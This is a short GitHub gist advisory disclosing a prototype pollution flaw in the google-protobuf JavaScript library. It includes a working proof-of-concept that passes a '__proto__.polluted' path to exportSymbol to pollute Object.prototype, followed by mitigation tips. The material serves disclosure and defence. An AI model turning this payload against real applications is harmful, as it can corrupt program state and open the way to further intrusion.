Skip to content

Instantly share code, notes, and snippets.

@tariqhawis

tariqhawis/google-protobuf-pp.md

Last active July 29, 2024 18:34
Show Gist options
  • Save tariqhawis/1b8f97321c6fdbe83b43b1defe425dcf to your computer and use it in GitHub Desktop.
Save tariqhawis/1b8f97321c6fdbe83b43b1defe425dcf to your computer and use it in GitHub Desktop.
Download ZIP
Prototype Pollution in google-protobuf, All versions
Raw
google-protobuf-pp.md

Overview

Affected versions of this module are vulnerable to Prototype Pollution due to missing check if the argument resolves to the object prototype. This allow the attacker to inject malicious object property using a built-in Object property such as __proto__ which recursively assigned to all the objects in the program.

PoC

(async () => {
  const goog = await import('google-protobuf');
var victim = {}
console.log("Before Attack: ", JSON.stringify(victim.__proto__));
try {
	goog.exportSymbol ("__proto__.polluted", true)
} catch (e) { 	}
console.log("After Attack: ", JSON.stringify(victim.__proto__));
delete Object.prototype.polluted;
})();

How to prevent:

  • Freeze the root prototype using Object.freeze
  • Require schema validation of JSON input.
  • Avoid using unsafe recursive merge functions.
  • Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.
  • As a best practice use Map instead of Object
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment